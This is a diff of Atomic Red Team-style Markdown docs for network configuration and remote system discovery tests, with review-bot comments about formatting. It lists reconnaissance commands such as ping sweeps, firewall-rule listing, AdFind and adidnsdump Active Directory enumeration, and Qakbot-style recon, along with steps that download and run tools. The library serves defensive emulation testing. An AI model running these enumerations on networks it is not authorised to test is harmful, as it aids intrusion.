- [Atomic Test #8 - List macOS Firewall Rules](#atomic-test-8---list-macos-firewall-rules)
- [Atomic Test #9 - DNS Server Discovery Using nslookup](#atomic-test-9---dns-server-discovery-using-nslookup)
<br/>
## Atomic Test #1 - System Network Configuration Discovery on Windows
Identify network configuration information
Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `970ab6a1-0157-4f3f-9a73-ec4166754b23`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
#### Attack Commands: Run with `command_prompt`!
```cmd
ipconfig /all
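Review bot: the rewritten table-of-contents anchors check out against GitHub's heading slug rules for the new `### Atomic Test #N: Name` form: `#` and `:` are dropped and each space becomes one hyphen, so `#atomic-test-1-system-network-configuration-discovery-on-windows` resolves, and the literal ` - ` inside test 6's name correctly survives as `---` in `#atomic-test-6-adfind---enumerate-active-directory-subnet-objects`. One thing to confirm by rendering the generated T1016.md: the added `### Atomic Test #1: System Network Configuration Discovery on Windows` heading is interleaved between the old `- [Atomic Test #1 - ...]` and `- [Atomic Test #2 - ...]` list entries in this hunk, which is only diff alignment provided the new file places the heading after the complete list and a blank line, not in the middle of it.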
@@ -42,32 +59,60 @@ nbtstat -n
net config
```
### Atomic Test #2: List Windows Firewall Rules
<br/>
<br/>
## Atomic Test #2 - List Windows Firewall Rules
Enumerates Windows Firewall Rules using netsh.
Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `038263cb-00f4-4b0a-98ae-0696c67e1752`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
#### Attack Commands: Run with `command_prompt`!
```cmd
netsh advfirewall firewall show rule name=all
```
### Atomic Test #3: System Network Configuration Discovery
<br/>
<br/>
## Atomic Test #3 - System Network Configuration Discovery
Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** `c141bbdb-7fca-4254-9fd6-f47e79447e17`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
#### Attack Commands: Run with `sh`!
```sh
if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
@@ -78,33 +123,42 @@ if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:l
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if arp command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)
```
### Atomic Test #4: System Network Configuration Discovery (TrickBot Style)
<br/>
<br/>
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `dafaf052-5508-402d-bf77-51e0700c02e2`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
#### Attack Commands: Run with `command_prompt`!
```cmd
ipconfig /all
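Review bot: `##### Check Prereq Commands:` and `##### Get Prereq Commands:` become h6 (`###### ...`) here while `##### Description: Check if arp command exists on the machine` stays at h5, so the two command blocks now nest under the description rather than sitting beside it. That reads better, but h6 is the deepest ATX level Markdown has, so there is no headroom left for any further sub-heading under a dependency and a seventh `#` would render as literal text. If that limit is acceptable, fine; otherwise keep the blocks at h5 and let the `Description:` line act as a label.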
@@ -113,8 +167,15 @@ net view /all /domain
nltest /domain_trusts
```
### Atomic Test #5: List Open Egress Ports
<br/>
<br/>
## Atomic Test #5 - List Open Egress Ports
This is to test for what ports are open outbound. The technique used was taken from the following blog:
https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
@@ -122,17 +183,23 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact
**Supported Platforms:** Windows
**auto_generated_guid:** `4b467538-f102-491d-ace7-ed487b853bf5`
#### Inputs
**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to write port scan results | path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
| portfile_url | URL to top-128.txt | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
| port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | path | PathToAtomicsFolder&#92;T1016&#92;src&#92;top-128.txt|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$ports = Get-content "#{port_file}"
@@ -163,108 +230,125 @@ $results | Out-File -Encoding ASCII -append $file
Write-Host $results
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item -ErrorAction ignore "#{output_file}"
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Test requires #{port_file} to exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{port_file}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{port_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
```
### Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects
<br/>
<br/>
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `9bb45dd7-c466-4f93-83a1-be30e56033ee`
#### Inputs
**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #7: Qakbot Recon
<br/>
<br/>
## Atomic Test #7 - Qakbot Recon
A list of commands known to be performed by Qakbot for recon purposes
**Supported Platforms:** Windows
**auto_generated_guid:** `121de5c6-5818-4868-b8a7-8fd07c455c1b`
#### Inputs
**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| recon_commands | File that houses list of commands to be executed | path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
"#{recon_commands}"
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: File to copy must exist on disk at specified location (#{recon_commands})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{recon_commands}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{recon_commands}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/qakbot.bat" -OutFile "#{recon_commands}"
```
### Atomic Test #8: List macOS Firewall Rules
<br/>
<br/>
## Atomic Test #8 - List macOS Firewall Rules
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
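Review bot: the description for Atomic Test #8 still opens with a stray `"` and carries YAML-escaped quotes (`\"Is it on or off?\"`) in the rendered Markdown (`"This will test if the macOS firewall is enabled...`). Those two lines are unchanged context, but since this commit replaces the generator it is the right moment to check that the Python side emits the description as the parsed YAML scalar rather than the quoted source string; every other description in this hunk renders cleanly, so the difference is probably in how that one entry is quoted in the YAML. Separately, the `Get Prereq Commands` for Test #6 fetch `AdFind.exe` with `Invoke-WebRequest` from `https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe` and the attack command then executes it; nothing in the generated text records an expected hash for that binary. Also unchanged by this commit, but worth noting in the docs.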
@@ -273,27 +357,54 @@ Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used
**Supported Platforms:** macOS
**auto_generated_guid:** `ff1d8c25-2aa4-4f18-a425-fede4a41ee88`
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
```
### Atomic Test #9: DNS Server Discovery Using nslookup
<br/>
<br/>
## Atomic Test #9 - DNS Server Discovery Using nslookup
Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
**Supported Platforms:** Windows
**auto_generated_guid:** `34557863-344a-468f-808b-a1bfb89b4fa9`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 34557863-344a-468f-808b-a1bfb89b4fa9
#### Attack Commands: Run with `command_prompt`!
```cmd
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%
```
<br/>
+449 -181
@@ -1,203 +1,324 @@
# T1018 - Remote System Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097), <code>net view</code> using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
> Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097), <code>net view</code> using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
>
> Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
>
> Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
[Source](https://attack.mitre.org/techniques/T1018)
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Remote System Discovery - net](#atomic-test-1-remote-system-discovery---net)
- [Atomic Test #2: Remote System Discovery - net group Domain Computers](#atomic-test-2-remote-system-discovery---net-group-domain-computers)
- [Atomic Test #3: Remote System Discovery - nltest](#atomic-test-3-remote-system-discovery---nltest)
- [Atomic Test #4: Remote System Discovery - ping sweep](#atomic-test-4-remote-system-discovery---ping-sweep)
- [Atomic Test #5: Remote System Discovery - arp](#atomic-test-5-remote-system-discovery---arp)
- [Atomic Test #6: Remote System Discovery - arp nix](#atomic-test-6-remote-system-discovery---arp-nix)
- [Atomic Test #7: Remote System Discovery - sweep](#atomic-test-7-remote-system-discovery---sweep)
- [Atomic Test #8: Remote System Discovery - nslookup](#atomic-test-8-remote-system-discovery---nslookup)
- [Atomic Test #9: Remote System Discovery - adidnsdump](#atomic-test-9-remote-system-discovery---adidnsdump)
- [Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects](#atomic-test-10-adfind---enumerate-active-directory-computer-objects)
- [Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects](#atomic-test-11-adfind---enumerate-active-directory-domain-controller-objects)
- [Atomic Test #12: Remote System Discovery - ip neighbour](#atomic-test-12-remote-system-discovery---ip-neighbour)
- [Atomic Test #13: Remote System Discovery - ip route](#atomic-test-13-remote-system-discovery---ip-route)
- [Atomic Test #14: Remote System Discovery - netstat](#atomic-test-14-remote-system-discovery---netstat)
- [Atomic Test #15: Remote System Discovery - ip tcp_metrics](#atomic-test-15-remote-system-discovery---ip-tcp_metrics)
- [Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-16-enumerate-domain-computers-within-active-directory-using-directorysearcher)
- [Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-17-enumerate-active-directory-computers-with-get-adcomputer)
- [Atomic Test #18: Enumerate Active Directory Computers with ADSISearcher](#atomic-test-18-enumerate-active-directory-computers-with-adsisearcher)
- [Atomic Test #19: Get-DomainController with PowerView](#atomic-test-19-get-domaincontroller-with-powerview)
- [Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers](#atomic-test-20-get-wmiobject-to-enumerate-domain-controllers)
- [Atomic Test #21: Remote System Discovery - net group Domain Controller](#atomic-test-21-remote-system-discovery---net-group-domain-controller)
- [Atomic Test #22: Enumerate Remote Hosts with Netscan](#atomic-test-22-enumerate-remote-hosts-with-netscan)
- [Atomic Test #1 - Remote System Discovery - net](#atomic-test-1---remote-system-discovery---net)
### Atomic Test #1: Remote System Discovery - net
- [Atomic Test #2 - Remote System Discovery - net group Domain Computers](#atomic-test-2---remote-system-discovery---net-group-domain-computers)
- [Atomic Test #3 - Remote System Discovery - nltest](#atomic-test-3---remote-system-discovery---nltest)
- [Atomic Test #4 - Remote System Discovery - ping sweep](#atomic-test-4---remote-system-discovery---ping-sweep)
- [Atomic Test #5 - Remote System Discovery - arp](#atomic-test-5---remote-system-discovery---arp)
- [Atomic Test #6 - Remote System Discovery - arp nix](#atomic-test-6---remote-system-discovery---arp-nix)
- [Atomic Test #7 - Remote System Discovery - sweep](#atomic-test-7---remote-system-discovery---sweep)
- [Atomic Test #8 - Remote System Discovery - nslookup](#atomic-test-8---remote-system-discovery---nslookup)
- [Atomic Test #9 - Remote System Discovery - adidnsdump](#atomic-test-9---remote-system-discovery---adidnsdump)
- [Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects](#atomic-test-10---adfind---enumerate-active-directory-computer-objects)
- [Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects](#atomic-test-11---adfind---enumerate-active-directory-domain-controller-objects)
- [Atomic Test #12 - Remote System Discovery - ip neighbour](#atomic-test-12---remote-system-discovery---ip-neighbour)
- [Atomic Test #13 - Remote System Discovery - ip route](#atomic-test-13---remote-system-discovery---ip-route)
- [Atomic Test #14 - Remote System Discovery - netstat](#atomic-test-14---remote-system-discovery---netstat)
- [Atomic Test #15 - Remote System Discovery - ip tcp_metrics](#atomic-test-15---remote-system-discovery---ip-tcp_metrics)
- [Atomic Test #16 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-16---enumerate-domain-computers-within-active-directory-using-directorysearcher)
- [Atomic Test #17 - Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-17---enumerate-active-directory-computers-with-get-adcomputer)
- [Atomic Test #18 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-18---enumerate-active-directory-computers-with-adsisearcher)
- [Atomic Test #19 - Get-DomainController with PowerView](#atomic-test-19---get-domaincontroller-with-powerview)
- [Atomic Test #20 - Get-WmiObject to Enumerate Domain Controllers](#atomic-test-20---get-wmiobject-to-enumerate-domain-controllers)
- [Atomic Test #21 - Remote System Discovery - net group Domain Controller](#atomic-test-21---remote-system-discovery---net-group-domain-controller)
- [Atomic Test #22 - Enumerate Remote Hosts with Netscan](#atomic-test-22---enumerate-remote-hosts-with-netscan)
<br/>
## Atomic Test #1 - Remote System Discovery - net
Identify remote systems with net.exe.
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
**Supported Platforms:** Windows
**auto_generated_guid:** `85321a9c-897f-4a60-9f20-29788e50bccd`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
#### Attack Commands: Run with `command_prompt`!
```cmd
net view /domain
net view
```
### Atomic Test #2: Remote System Discovery - net group Domain Computers
<br/>
<br/>
## Atomic Test #2 - Remote System Discovery - net group Domain Computers
Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `f1bf6c8f-9016-4edf-aff9-80b65f5d711f`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
#### Attack Commands: Run with `command_prompt`!
```cmd
net group "Domain Computers" /domain
```
### Atomic Test #3: Remote System Discovery - nltest
<br/>
<br/>
## Atomic Test #3 - Remote System Discovery - nltest
Identify domain controllers for specified domain.
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `52ab5108-3f6f-42fb-8ba3-73bc054f22c8`
#### Inputs
**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_domain | Domain to query for domain controllers | string | %userdnsdomain%|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
nltest.exe /dclist:#{target_domain}
```
### Atomic Test #4: Remote System Discovery - ping sweep
<br/>
<br/>
## Atomic Test #4 - Remote System Discovery - ping sweep
Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `6db1f57f-d1d5-4223-8a66-55c9c65a9592`
#### Inputs
**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Last octet starting value for ping sweep. | string | 1|
| stop_host | Last octet ending value for ping sweep. | string | 254|
| subnet | Subnet used for ping sweep. | string | 192.168.1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
```
### Atomic Test #5: Remote System Discovery - arp
<br/>
<br/>
## Atomic Test #5 - Remote System Discovery - arp
Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `2d5a61f5-0447-4be4-944a-1f8530ed6574`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
#### Attack Commands: Run with `command_prompt`!
```cmd
arp -a
```
### Atomic Test #6: Remote System Discovery - arp nix
<br/>
<br/>
## Atomic Test #6 - Remote System Discovery - arp nix
Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `acb6b1ff-e2ad-4d64-806c-6c35fe73b951`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
#### Attack Commands: Run with `sh`!
```sh
arp -a | grep -v '^?'
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if arp command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)
```
### Atomic Test #7: Remote System Discovery - sweep
<br/>
<br/>
## Atomic Test #7 - Remote System Discovery - sweep
Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `96db2632-8417-4dbb-b8bb-a8b92ba391de`
#### Inputs
**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Subnet used for ping sweep. | string | 1|
| stop_host | Subnet used for ping sweep. | string | 254|
| subnet | Subnet used for ping sweep. | string | 192.168.1|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
```
### Atomic Test #8: Remote System Discovery - nslookup
<br/>
<br/>
## Atomic Test #8 - Remote System Discovery - nslookup
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `baa01aaa-5e13-45ec-8a0d-e46c93c9760f`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
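Review bot: in the Atomic Test #7 inputs table, `start_host` and `stop_host` carry the same description as `subnet` (`Subnet used for ping sweep.`), whereas the Windows counterpart in Atomic Test #4 describes them as `Last octet starting value for ping sweep.` and `Last octet ending value for ping sweep.`; since this conversion regenerates every table row anyway, the two descriptions should be corrected in the same pass so the rendered inputs say what the `seq #{start_host} #{stop_host}` loop actually consumes.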
@@ -208,18 +329,29 @@ $thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
```
### Atomic Test #9: Remote System Discovery - adidnsdump
<br/>
<br/>
## Atomic Test #9 - Remote System Discovery - adidnsdump
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will list dns zones in the terminal.
**Supported Platforms:** Windows
**auto_generated_guid:** `95e19466-469e-4316-86d2-1dc401b5a959`
#### Inputs
**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username including domain. | string | domain&#92;user|
@@ -227,246 +359,297 @@ Successful execution of this test will list dns zones in the terminal.
| host_name | hostname or ip address to connect to. | string | 192.168.1.1|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1018|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```
##### Description: Computer must have venv configured at #{venv_path}
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
py -m venv "#{venv_path}"
```
##### Description: adidnsdump must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
```
### Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects
<br/>
<br/>
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `a889f5be-2d54-4050-bd05-884578748bb4`
#### Inputs
**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects
<br/>
<br/>
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `5838c31e-a0e2-4b9f-b60a-d79d2cb7995e`
#### Inputs
**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
